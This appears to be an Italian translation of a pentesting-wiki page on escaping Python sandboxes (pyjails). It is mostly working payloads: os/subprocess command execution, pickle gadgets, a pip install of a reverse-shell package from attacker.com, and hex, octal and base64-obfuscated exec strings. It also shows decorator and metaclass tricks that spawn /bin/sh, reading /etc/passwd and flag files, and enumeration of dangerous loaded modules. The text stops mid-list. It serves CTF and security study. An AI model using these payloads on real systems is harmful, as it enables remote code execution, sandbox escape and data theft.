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{% endhint %} Questi sono alcuni trucchi per bypassare le protezioni della sandbox di Python ed eseguire comandi arbitrari. ## Librerie di Esecuzione Comandi La prima cosa che devi sapere è se puoi eseguire direttamente codice con qualche libreria già importata, o se puoi importare una di queste librerie: ```python os.system("ls") os.popen("ls").read() commands.getstatusoutput("ls") commands.getoutput("ls") commands.getstatus("file/path") subprocess.call("ls", shell=True) subprocess.Popen("ls", shell=True) pty.spawn("ls") pty.spawn("/bin/bash") platform.os.system("ls") pdb.os.system("ls") #Import functions to execute commands importlib.import_module("os").system("ls") importlib.__import__("os").system("ls") imp.load_source("os","/usr/lib/python3.8/os.py").system("ls") imp.os.system("ls") imp.sys.modules["os"].system("ls") sys.modules["os"].system("ls") __import__("os").system("ls") import os from os import * #Other interesting functions open("/etc/passwd").read() open('/var/www/html/input', 'w').write('123') #In Python2.7 execfile('/usr/lib/python2.7/os.py') system('ls') ``` Ricorda che le funzioni _**open**_ e _**read**_ possono essere utili per **leggere file** all'interno della sandbox python e per **scrivere del codice** che potresti **eseguire** per **bypassare** la sandbox. {% hint style="danger" %} La funzione **input()** di Python2 consente di eseguire codice python prima che il programma si arresti. {% endhint %} Python cerca di **caricare le librerie dalla directory corrente per prima** (il seguente comando stamperà da dove python sta caricando i moduli): `python3 -c 'import sys; print(sys.path)'` ![](<../../../.gitbook/assets/image (559).png>) ## Bypassare la sandbox pickle con i pacchetti python installati di default ### Pacchetti di default Puoi trovare un **elenco dei pacchetti pre-installati** qui: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\ Nota che da un pickle puoi far sì che l'ambiente python **importi librerie arbitrarie** installate nel sistema.\ Ad esempio, il seguente pickle, quando caricato, importerà la libreria pip per usarla: ```python #Note that here we are importing the pip library so the pickle is created correctly #however, the victim doesn't even need to have the library installed to execute it #the library is going to be loaded automatically import pickle, os, base64, pip class P(object): def __reduce__(self): return (pip.main,(["list"],)) print(base64.b64encode(pickle.dumps(P(), protocol=0))) ``` Per ulteriori informazioni su come funziona pickle, controlla questo: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/) ### Pacchetto Pip Trucco condiviso da **@isHaacK** Se hai accesso a `pip` o `pip.main()`, puoi installare un pacchetto arbitrario e ottenere una reverse shell chiamando: ```bash pip install http://attacker.com/Rerverse.tar.gz pip.main(["install", "http://attacker.com/Rerverse.tar.gz"]) ``` Puoi scaricare il pacchetto per creare la reverse shell qui. Si prega di notare che prima di utilizzarlo è necessario **decomprimerlo, modificare il `setup.py` e inserire il proprio IP per la reverse shell**: {% file src="../../../.gitbook/assets/Reverse.tar (1).gz" %} {% hint style="info" %} Questo pacchetto si chiama `Reverse`. Tuttavia, è stato appositamente creato in modo che quando esci dalla reverse shell il resto dell'installazione fallisca, quindi **non lascerai alcun pacchetto python extra installato sul server** quando te ne vai. {% endhint %} ## Eval-ing python code {% hint style="warning" %} Nota che exec consente stringhe multilinea e ";", ma eval non lo fa (controlla l'operatore walrus) {% endhint %} Se alcuni caratteri sono vietati, puoi utilizzare la **rappresentazione hex/octal/B64** per **bypassare** la restrizione: ```python exec("print('RCE'); __import__('os').system('ls')") #Using ";" exec("print('RCE')\n__import__('os').system('ls')") #Using "\n" eval("__import__('os').system('ls')") #Eval doesn't allow ";" eval(compile('print("hello world"); print("heyy")', '', 'exec')) #This way eval accept ";" __import__('timeit').timeit("__import__('os').system('ls')",number=1) #One liners that allow new lines and tabs eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '', 'exec')) exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '', 'exec')) ``` ```python #Octal exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51") #Hex exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29") #Base64 exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2 exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk=')) ``` ### Altre librerie che consentono di valutare il codice python ```python #Pandas import pandas as pd df = pd.read_csv("currency-rates.csv") df.query('@__builtins__.__import__("os").system("ls")') df.query("@pd.io.common.os.popen('ls').read()") df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')") # The previous options work but others you might try give the error: # Only named functions are supported # Like: df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')") ``` ## Operatori e trucchi brevi ```python # walrus operator allows generating variable inside a list ## everything will be executed in order ## From https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/ [a:=21,a*2] [y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})] ## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";" ``` ## Bypassare le protezioni attraverso le codifiche (UTF-7) In [**questo articolo**](https://blog.arkark.dev/2022/11/18/seccon-en/#misc-latexipy) UFT-7 viene utilizzato per caricare ed eseguire codice python arbitrario all'interno di un apparente sandbox: ```python assert b"+AAo-".decode("utf_7") == "\n" payload = """ # -*- coding: utf_7 -*- def f(x): return x #+AAo-print(open("/flag.txt").read()) """.lstrip() ``` È anche possibile eluderlo utilizzando altre codifiche, ad esempio `raw_unicode_escape` e `unicode_escape`. ## Esecuzione di Python senza chiamate Se sei all'interno di una prigione python che **non ti consente di effettuare chiamate**, ci sono ancora alcuni modi per **eseguire funzioni, codice** e **comandi arbitrari**. ### RCE con [decoratori](https://docs.python.org/3/glossary.html#term-decorator) ```python # From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ @exec @input class X: pass # The previous code is equivalent to: class X: pass X = input(X) X = exec(X) # So just send your python code when prompted and it will be executed # Another approach without calling input: @eval @'__import__("os").system("sh")'.format class _:pass ``` ### RCE creando oggetti e sovraccarico Se puoi **dichiarare una classe** e **creare un oggetto** di quella classe, potresti **scrivere/sovrascrivere diversi metodi** che possono essere **attivati** **senza** **doverli chiamare direttamente**. #### RCE con classi personalizzate Puoi modificare alcuni **metodi di classe** (_sovrascrivendo metodi di classe esistenti o creando una nuova classe_) per farli **eseguire codice arbitrario** quando **attivati** senza chiamarli direttamente. ```python # This class has 3 different ways to trigger RCE without directly calling any function class RCE: def __init__(self): self += "print('Hello from __init__ + __iadd__')" __iadd__ = exec #Triggered when object is created def __del__(self): self -= "print('Hello from __del__ + __isub__')" __isub__ = exec #Triggered when object is created __getitem__ = exec #Trigerred with obj[] __add__ = exec #Triggered with obj + # These lines abuse directly the previous class to get RCE rce = RCE() #Later we will see how to create objects without calling the constructor rce["print('Hello from __getitem__')"] rce + "print('Hello from __add__')" del rce # These lines will get RCE when the program is over (exit) sys.modules["pwnd"] = RCE() exit() # Other functions to overwrite __sub__ (k - 'import os; os.system("sh")') __mul__ (k * 'import os; os.system("sh")') __floordiv__ (k // 'import os; os.system("sh")') __truediv__ (k / 'import os; os.system("sh")') __mod__ (k % 'import os; os.system("sh")') __pow__ (k**'import os; os.system("sh")') __lt__ (k < 'import os; os.system("sh")') __le__ (k <= 'import os; os.system("sh")') __eq__ (k == 'import os; os.system("sh")') __ne__ (k != 'import os; os.system("sh")') __ge__ (k >= 'import os; os.system("sh")') __gt__ (k > 'import os; os.system("sh")') __iadd__ (k += 'import os; os.system("sh")') __isub__ (k -= 'import os; os.system("sh")') __imul__ (k *= 'import os; os.system("sh")') __ifloordiv__ (k //= 'import os; os.system("sh")') __idiv__ (k /= 'import os; os.system("sh")') __itruediv__ (k /= 'import os; os.system("sh")') (Note that this only works when from __future__ import division is in effect.) __imod__ (k %= 'import os; os.system("sh")') __ipow__ (k **= 'import os; os.system("sh")') __ilshift__ (k<<= 'import os; os.system("sh")') __irshift__ (k >>= 'import os; os.system("sh")') __iand__ (k = 'import os; os.system("sh")') __ior__ (k |= 'import os; os.system("sh")') __ixor__ (k ^= 'import os; os.system("sh")') ``` #### Creazione di oggetti con [metaclassi](https://docs.python.org/3/reference/datamodel.html#metaclasses) La cosa fondamentale che le metaclassi ci permettono di fare è **creare un'istanza di una classe, senza chiamare direttamente il costruttore**, creando una nuova classe con la classe target come metaclasse. ```python # Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed # This will define the members of the "subclass" class Metaclass(type): __getitem__ = exec # So Sub[string] will execute exec(string) # Note: Metaclass.__class__ == type class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass pass # Nothing special to do Sub['import os; os.system("sh")'] ## You can also use the tricks from the previous section to get RCE with this object ``` #### Creazione di oggetti con eccezioni Quando viene **attivata un'eccezione**, un oggetto di **Exception** viene **creato** senza che tu debba chiamare direttamente il costruttore (un trucco di [**@\_nag0mez**](https://mobile.twitter.com/\_nag0mez)): ```python class RCE(Exception): def __init__(self): self += 'import os; os.system("sh")' __iadd__ = exec #Triggered when object is created raise RCE #Generate RCE object # RCE with __add__ overloading and try/except + raise generated object class Klecko(Exception): __add__ = exec try: raise Klecko except Klecko as k: k + 'import os; os.system("sh")' #RCE abusing __add__ ## You can also use the tricks from the previous section to get RCE with this object ``` ### Maggiore RCE ```python # From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ # If sys is imported, you can sys.excepthook and trigger it by triggering an error class X: def __init__(self, a, b, c): self += "os.system('sh')" __iadd__ = exec sys.excepthook = X 1/0 #Trigger it # From https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py # The interpreter will try to import an apt-specific module to potentially # report an error in ubuntu-provided modules. # Therefore the __import__ functions are overwritten with our RCE class X(): def __init__(self, a, b, c, d, e): self += "print(open('flag').read())" __iadd__ = eval __builtins__.__import__ = X {}[1337] ``` ### Leggi il file con l'aiuto e la licenza dei builtins ```python __builtins__.__dict__["license"]._Printer__filenames=["flag"] a = __builtins__.help a.__class__.__enter__ = __builtins__.__dict__["license"] a.__class__.__exit__ = lambda self, *args: None with (a as b): pass ``` ## Builtins * [**Funzioni builtins di python2**](https://docs.python.org/2/library/functions.html) * [**Funzioni builtins di python3**](https://docs.python.org/3/library/functions.html) Se puoi accedere all'oggetto **`__builtins__`** puoi importare librerie (nota che potresti anche usare qui un'altra rappresentazione di stringa mostrata nell'ultima sezione): ```python __builtins__.__import__("os").system("ls") __builtins__.__dict__['__import__']("os").system("ls") ``` ### No Builtins Quando non hai `__builtins__`, non sarai in grado di importare nulla né di leggere o scrivere file poiché **tutte le funzioni globali** (come `open`, `import`, `print`...) **non sono caricate**.\ Tuttavia, **per impostazione predefinita, python importa molti moduli in memoria**. Questi moduli possono sembrare benigni, ma alcuni di essi **importano anche funzionalità pericolose** al loro interno che possono essere accessibili per ottenere anche **l'esecuzione di codice arbitrario**. Nei seguenti esempi puoi osservare come **abuse** di alcuni di questi moduli "**benigni**" caricati per **accedere** a **funzionalità** **pericolose** al loro interno. **Python2** ```python #Try to reload __builtins__ reload(__builtins__) import __builtin__ # Read recovering in offset 40 ().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read() # Write recovering in offset 40 ().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123') # Execute recovering __import__ (class 59s is ) ().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls') # Execute (another method) ().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls') # Execute recovering eval symbol (class 59 is ) ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')") # Or you could obtain the builtins from a defined function get_flag.__globals__['__builtins__']['__import__']("os").system("ls") ``` #### Python3 ```python # Obtain builtins from a globally defined function # https://docs.python.org/3/library/functions.html help.__call__.__builtins__ # or __globals__ license.__call__.__builtins__ # or __globals__ credits.__call__.__builtins__ # or __globals__ print.__self__ dir.__self__ globals.__self__ len.__self__ __build_class__.__self__ # Obtain the builtins from a defined function get_flag.__globals__['__builtins__'] # Get builtins from loaded classes [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"] ``` [**Di seguito c'è una funzione più grande**](./#recursive-search-of-builtins-globals) per trovare decine/**centinaia** di **posti** dove puoi trovare i **builtins**. #### Python2 e Python3 ```python # Recover __builtins__ and make everything easier __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__ __builtins__["__import__"]('os').system('ls') ``` ### Payloads builtins ```python # Possible payloads once you have found the builtins __builtins__["open"]("/etc/passwd").read() __builtins__["__import__"]("os").system("ls") # There are lots of other payloads that can be abused to execute commands # See them below ``` ## Globals e locals Controllare i **`globals`** e **`locals`** è un buon modo per sapere a cosa puoi accedere. ```python >>> globals() {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': , '__spec__': None, '__annotations__': {}, '__builtins__': , 'attr': , 'a': , 'b': , 'c': , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', , 1): True}, 'z': } >>> locals() {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': , '__spec__': None, '__annotations__': {}, '__builtins__': , 'attr': , 'a': , 'b': , 'c': , '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', , 1): True}, 'z': } # Obtain globals from a defined function get_flag.__globals__ # Obtain globals from an object of a class class_obj.__init__.__globals__ # Obtaining globals directly from loaded classes [ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x) ] [] # Obtaining globals from __init__ of loaded classes [ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ] [, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ] # Without the use of the dir() function [ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)] [, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ] ``` [**Di seguito c'è una funzione più grande**](./#recursive-search-of-builtins-globals) per trovare decine/**centinaia** di **posti** dove puoi trovare i **globals**. ## Scoprire Esecuzione Arbitraria Qui voglio spiegare come scoprire facilmente **funzionalità più pericolose caricate** e proporre exploit più affidabili. #### Accesso a sottoclassi con bypass Una delle parti più sensibili di questa tecnica è essere in grado di **accedere alle sottoclassi di base**. Negli esempi precedenti questo è stato fatto usando `''.__class__.__base__.__subclasses__()` ma ci sono **altri modi possibili**: ```python #You can access the base from mostly anywhere (in regular conditions) "".__class__.__base__.__subclasses__() [].__class__.__base__.__subclasses__() {}.__class__.__base__.__subclasses__() ().__class__.__base__.__subclasses__() (1).__class__.__base__.__subclasses__() bool.__class__.__base__.__subclasses__() print.__class__.__base__.__subclasses__() open.__class__.__base__.__subclasses__() defined_func.__class__.__base__.__subclasses__() #You can also access it without "__base__" or "__class__" # You can apply the previous technique also here "".__class__.__bases__[0].__subclasses__() "".__class__.__mro__[1].__subclasses__() "".__getattribute__("__class__").mro()[1].__subclasses__() "".__getattribute__("__class__").__base__.__subclasses__() # This can be useful in case it is not possible to make calls (therefore using decorators) ().__class__.__class__.__subclasses__(().__class__.__class__)[0].register.__builtins__["breakpoint"]() # From https://github.com/salvatore-abello/python-ctf-cheatsheet/tree/main/pyjails#no-builtins-no-mro-single-exec #If attr is present you can access everything as a string # This is common in Django (and Jinja) environments (''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read() (''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read() ``` ### Trovare librerie pericolose caricate Ad esempio, sapendo che con la libreria **`sys`** è possibile **importare librerie arbitrarie**, puoi cercare tutti i **moduli caricati che hanno importato sys al loro interno**: ```python [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ] ['_ModuleLock', '_DummyModuleLock', '_ModuleLockManager', 'ModuleSpec', 'FileLoader', '_NamespacePath', '_NamespaceLoader', 'FileFinder', 'zipimporter', '_ZipImportResourceReader', 'IncrementalEncoder', 'IncrementalDecoder', 'StreamReaderWriter', 'StreamRecoder', '_wrap_close', 'Quitter', '_Printer', 'WarningMessage', 'catch_warnings', '_GeneratorContextManagerBase', '_BaseExitStack', 'Untokenizer', 'FrameSummary', 'TracebackException', 'CompletedProcess', 'Popen', 'finalize', 'NullImporter', '_HackedGetData', '_localized_month', '_localized_day', 'Calendar', 'different_locale', 'SSLObject', 'Request', 'OpenerDirector', 'HTTPPasswordMgr', 'AbstractBasicAuthHandler', 'AbstractDigestAuthHandler', 'URLopener', '_PaddedFile', 'CompressedValue', 'LogRecord', 'PercentStyle', 'Formatter', 'BufferingFormatter', 'Filter', 'Filterer', 'PlaceHolder', 'Manager', 'LoggerAdapter', '_LazyDescr', '_SixMetaPathImporter', 'MimeTypes', 'ConnectionPool', '_LazyDescr', '_SixMetaPathImporter', 'Bytecode', 'BlockFinder', 'Parameter', 'BoundArguments', 'Signature', '_DeprecatedValue', '_ModuleWithDeprecations', 'Scrypt', 'WrappedSocket', 'PyOpenSSLContext', 'ZipInfo', 'LZMACompressor', 'LZMADecompressor', '_SharedFile', '_Tellable', 'ZipFile', 'Path', '_Flavour', '_Selector', 'JSONDecoder', 'Response', 'monkeypatch', 'InstallProgress', 'TextProgress', 'BaseDependency', 'Origin', 'Version', 'Package', '_Framer', '_Unframer', '_Pickler', '_Unpickler', 'NullTranslations'] ``` Ci sono molte, e **ne abbiamo solo bisogno di una** per eseguire comandi: ```python [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls") ``` Possiamo fare la stessa cosa con **altre librerie** che sappiamo possono essere utilizzate per **eseguire comandi**: ```python #os [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" in x.__init__.__globals__ ][0]["os"].system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "os" == x.__init__.__globals__["__name__"] ][0]["system"]("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'os." in str(x) ][0]['system']('ls') #subprocess [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "subprocess" == x.__init__.__globals__["__name__"] ][0]["Popen"]("ls") [ x for x in ''.__class__.__base__.__subclasses__() if "'subprocess." in str(x) ][0]['Popen']('ls') [ x for x in ''.__class__.__base__.__subclasses__() if x.__name__ == 'Popen' ][0]('ls') #builtins [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "__bultins__" in x.__init__.__globals__ ] [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"].__import__("os").system("ls") #sys [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "sys" in x.__init__.__globals__ ][0]["sys"].modules["os"].system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"].system("ls") #commands (not very common) [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "commands" in x.__init__.__globals__ ][0]["commands"].getoutput("ls") #pty (not very common) [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pty" in x.__init__.__globals__ ][0]["pty"].spawn("ls") #importlib [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].import_module("os").system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "importlib" in x.__init__.__globals__ ][0]["importlib"].__import__("os").system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].import_module("os").system("ls") [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'imp." in str(x) ][0]["importlib"].__import__("os").system("ls") #pdb [ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "pdb" in x.__init__.__globals__ ][0]["pdb"].os.system("ls") ``` Inoltre, potremmo anche cercare quali moduli stanno caricando librerie dannose: ```python bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"] for b in bad_libraries_names: vuln_libs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and b in x.__init__.__globals__ ] print(f"{b}: {', '.join(vuln_libs)}") """ os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations commands: subprocess: BaseDependency, Origin, Version, Package pty: importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path imp: sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature pdb: """ ``` Inoltre, se pensi che **altre librerie** possano **invocare funzioni per eseguire comandi**, possiamo anche **filtrare per nomi di funzioni** all'interno delle possibili librerie: ```python bad_libraries_names = ["os", "commands", "subprocess", "pty", "importlib", "imp", "sys", "builtins", "pip", "pdb"] bad_func_names = ["system", "popen", "getstatusoutput", "getoutput", "call", "Popen", "spawn", "import_module", "__import__", "load_source", "execfile", "execute", "__builtins__"] for b in bad_libraries_names + bad_func_names: vuln_funcs = [ x.__name__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) for k in x.__init__.__globals__ if k == b ] print(f"{b}: {', '.join(vuln_funcs)}") """ os: CompletedProcess, Popen, NullImporter, _HackedGetData, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, HTTPConnection, MimeTypes, BlockFinder, Parameter, BoundArguments, Signature, _FragList, _SSHFormatECDSA, CertificateSigningRequestBuilder, CertificateBuilder, CertificateRevocationListBuilder, RevokedCertificateBuilder, _CallbackExceptionHelper, Context, Connection, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, Cookie, CookieJar, BaseAdapter, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _WrappedLock, Cache, ProblemResolver, _FilteredCacheHelper, FilteredCache, NullTranslations commands: subprocess: BaseDependency, Origin, Version, Package pty: importlib: NullImporter, _HackedGetData, BlockFinder, Parameter, BoundArguments, Signature, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path imp: sys: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, WarningMessage, catch_warnings, _GeneratorContextManagerBase, _BaseExitStack, Untokenizer, FrameSummary, TracebackException, CompletedProcess, Popen, finalize, NullImporter, _HackedGetData, _localized_month, _localized_day, Calendar, different_locale, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, CompressedValue, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, MimeTypes, ConnectionPool, _LazyDescr, _SixMetaPathImporter, Bytecode, BlockFinder, Parameter, BoundArguments, Signature, _DeprecatedValue, _ModuleWithDeprecations, Scrypt, WrappedSocket, PyOpenSSLContext, ZipInfo, LZMACompressor, LZMADecompressor, _SharedFile, _Tellable, ZipFile, Path, _Flavour, _Selector, JSONDecoder, Response, monkeypatch, InstallProgress, TextProgress, BaseDependency, Origin, Version, Package, _Framer, _Unframer, _Pickler, _Unpickler, NullTranslations, _wrap_close builtins: FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, Repr, Completer, CompletedProcess, Popen, _PaddedFile, BlockFinder, Parameter, BoundArguments, Signature pip: pdb: system: _wrap_close, _wrap_close getstatusoutput: CompletedProcess, Popen getoutput: CompletedProcess, Popen call: CompletedProcess, Popen Popen: CompletedProcess, Popen spawn: import_module: __import__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec load_source: NullImporter, _HackedGetData execfile: execute: __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, FileLoader, _NamespacePath, _NamespaceLoader, FileFinder, zipimporter, _ZipImportResourceReader, IncrementalEncoder, IncrementalDecoder, StreamReaderWriter, StreamRecoder, _wrap_close, Quitter, _Printer, DynamicClassAttribute, _GeneratorWrapper, WarningMessage, catch_warnings, Repr, partialmethod, singledispatchmethod, cached_property, _GeneratorContextManagerBase, _BaseExitStack, Completer, State, SubPattern, Tokenizer, Scanner, Untokenizer, FrameSummary, TracebackException, _IterationGuard, WeakSet, _RLock, Condition, Semaphore, Event, Barrier, Thread, CompletedProcess, Popen, finalize, _TemporaryFileCloser, _TemporaryFileWrapper, SpooledTemporaryFile, TemporaryDirectory, NullImporter, _HackedGetData, DOMBuilder, DOMInputSource, NamedNodeMap, TypeInfo, ReadOnlySequentialNamedNodeMap, ElementInfo, Template, Charset, Header, _ValueFormatter, _localized_month, _localized_day, Calendar, different_locale, AddrlistClass, _PolicyBase, BufferedSubFile, FeedParser, Parser, BytesParser, Message, HTTPConnection, SSLObject, Request, OpenerDirector, HTTPPasswordMgr, AbstractBasicAuthHandler, AbstractDigestAuthHandler, URLopener, _PaddedFile, Address, Group, HeaderRegistry, ContentManager, CompressedValue, _Feature, LogRecord, PercentStyle, Formatter, BufferingFormatter, Filter, Filterer, PlaceHolder, Manager, LoggerAdapter, _LazyDescr, _SixMetaPathImporter, Queue, _PySimpleQueue, HMAC, Timeout, Retry, HTTPConnection, 